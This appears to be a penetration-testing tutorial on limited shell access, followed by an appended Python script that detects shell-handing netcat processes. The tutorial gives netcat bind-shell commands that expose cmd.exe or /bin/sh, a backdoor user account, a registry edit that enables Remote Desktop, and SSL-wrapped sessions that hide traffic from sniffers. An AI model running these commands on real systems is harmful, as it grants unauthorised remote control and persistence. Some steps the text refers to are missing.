Shell access on a Unix-type server lets you send commands to a target as a user of the system and get a response back (standard input to a shell and standard output from that shell). This shell service is limited: some commands will work and others will not. Windows shell access has a similar limited command structure, and in this article, I will explore how to navigate shell access and give some interesting tips as well.

With netcat, I can illustrate shell access on a Windows target. Beginning on a Windows machine, open up a command prompt and start a netcat listener:

    ncat.exe -l -p 5555 -e cmd.exe

You might have to install the program before you continue. Now connect to the Windows box from your Linux machine via the netcat listener:

    ncat 10.10.2.239 5555

Many commands are available, but you should avoid some of them because they will break your shell, and you will have to restart your listener. Although this might not seem important, if you have worked a number of hours to get a shell, you don't want to lose it. A few of the commands that will break your shell are:

    telnet

Having Sysinternals installed on Windows would be a great help, but if it's not, you can add a new user and log in to get a terminal:

    net user cr0wn password /ADD

In this example, I have added the user cr0wn to the Windows account with the password password. Something to consider when doing this is that, if someone is running a sniffer, this information will be passed in the clear, so you might want to encrypt it. To encrypt, start the listener with the -ssl option:

    $ ncat -l -ssl -p 6666 -e /bin/sh

Then, I connect with the command:

    $ ncat -ssl 10.9.11.32 6666

Now all of your communication is encrypted, as you can see by capturing on port 6666 and opening the captured file with Wireshark (Figures 1 and 2).

Now I have taken a limited shell account on the Windows target and added a user, discovered what services were running and used one of the services (WinSSHD) to log in remotely and get a terminal session. If there are a limited number of services running on the Windows box, you will need to start those services. For instance, use the following to allow Remote Desktop to the Windows box:

    > reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

To remove this functionality, use the command:

    > reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

When you are finished, remove the account you have created with:

    C:\> net user cr0wn /del

Now I will explore the limited shell capability on a Linux box. The same approach applies as before with Windows, in that I want to allow access to a terminal. Here, I start a netcat listener on the Linux box and connect to it with:

    $ ncat 10.9.11.32 5555

This command connects to the Linux box with an IP address of 10.9.11.32 on port 5555. As with the Windows example, -ssl can be added to hide my conversation from a sniffer on the network. Adding a user account is another way to get terminal access on your target Linux box, which will work if the netcat listener is running as root (Figure 6). Avoid using any command that requires a password, because the prompt appears on the machine where the netcat listener is running, which is not the box you are on, and that will cause your shell to crash. Now, I can run some commands to see what kind of box I have. Next, I need to give the user a password, and this is when having -ssl enabled on your netcat connection is important. Now I can check to see whether SSH is running and log in for terminal access:

    ps -aef | grep ssh

This command shows the output:

    root 571 1 0 Mar26 ? 00:00:00 /usr/sbin/sshd -D

Now I can SSH into the target box with my new user account and have terminal access. If SSH is not running on the Linux box, I need to start the service, which can be different with various flavors of Linux.
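As an added example, not part of the original article, here is a small Python audit that applies the article's own checks from the defender's side: it parses ps -aef output, flags netcat processes that hand a shell to the peer with -e, records whether -ssl was set, and reports whether sshd is running. It goes slightly beyond the article by also recognising a connect-back (reverse) netcat with -e; the sample listing, its PIDs and the netcat lines are constructed.

```python
import shlex

# Constructed sample of `ps -aef` output. The sshd line mirrors the one quoted
# in the article; the PIDs and the netcat lines are made up for this example.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root       571     1  0 Mar26 ?        00:00:00 /usr/sbin/sshd -D
root      4242  3999  0 10:12 pts/0    00:00:00 ncat -l -ssl -p 6666 -e /bin/sh
user      4310  4001  0 10:15 pts/1    00:00:00 nc -l -p 5555 -e /bin/bash
user      4400  4001  0 10:16 pts/1    00:00:00 ncat 10.9.11.32 5555
"""

NETCAT_BINARIES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd", "ncat.exe"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}   # flags that hand a program to the peer

def parse_ps(text):
    """Split `ps -aef` output into rows with uid, pid, ppid and the argv list."""
    rows = []
    for line in text.splitlines()[1:]:           # skip the header row
        parts = line.split(None, 7)              # the CMD column keeps its own spaces
        if len(parts) < 8:
            continue
        rows.append({"uid": parts[0], "pid": int(parts[1]),
                     "ppid": int(parts[2]), "argv": shlex.split(parts[7])})
    return rows

def classify_netcat(argv):
    """Describe a netcat process that hands a shell to its peer; None otherwise."""
    name = argv[0].rsplit("/", 1)[-1]
    if name not in NETCAT_BINARIES:
        return None
    exec_target = None
    for i, arg in enumerate(argv):
        if arg in EXEC_FLAGS and i + 1 < len(argv):
            exec_target = argv[i + 1]
    if exec_target is None:
        return None                              # plain client or listener, no shell attached
    listener = any(a in ("-l", "--listen") for a in argv)
    encrypted = any(a in ("-ssl", "--ssl") for a in argv)
    return {"kind": "bind shell" if listener else "reverse shell",
            "exec": exec_target, "encrypted": encrypted}

def audit(ps_text):
    """Return the shell-handing netcat processes and whether sshd is running."""
    rows = parse_ps(ps_text)
    findings = []
    for row in rows:
        finding = classify_netcat(row["argv"])
        if finding:
            finding.update(pid=row["pid"], uid=row["uid"])
            findings.append(finding)
    sshd_running = any(row["argv"][0].endswith("sshd") for row in rows)
    return {"sshd_running": sshd_running, "netcat_shells": findings}
```

Run audit() over real `ps -aef` output to list listeners that expose a shell, with the root-owned plaintext ones being the most urgent to investigate.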